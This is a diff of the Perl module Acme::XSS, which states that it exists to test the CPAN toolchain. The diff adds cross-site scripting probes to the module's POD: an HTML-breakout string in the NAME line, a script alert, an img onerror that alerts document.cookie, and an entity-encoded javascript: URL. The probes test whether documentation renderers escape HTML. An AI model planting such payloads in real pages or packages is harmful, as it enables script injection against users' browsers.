@@ -1,31 +1,36 @@
 package Acme::XSS;
 use strict;
 use warnings;
-use 5.008008;
-our $VERSION = '0.01';
+use 5.013001;
+our $VERSION = '0.02';
 
 
 
 1;
 __END__
 
+=for stopwords xmp XSS
+
 =encoding utf8
 
 =head1 NAME
 
-Acme::XSS - XSS
+Acme::XSS - "><xmp>XSS Testing
 
 =head1 SYNOPSIS
 
-  use Acme::XSS;
+    use Acme::XSS;
+    <xmp>
 
 =head1 DESCRIPTION
 
-Acme::XSS is
+This is a module to testing CPAN toolchain.
 
 =begin html
 
 <script>alert("all your codes are belongs to us");</script>
+<img onerror="javascript:alert(document.cookie);" src="/">
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 
 =end html
 
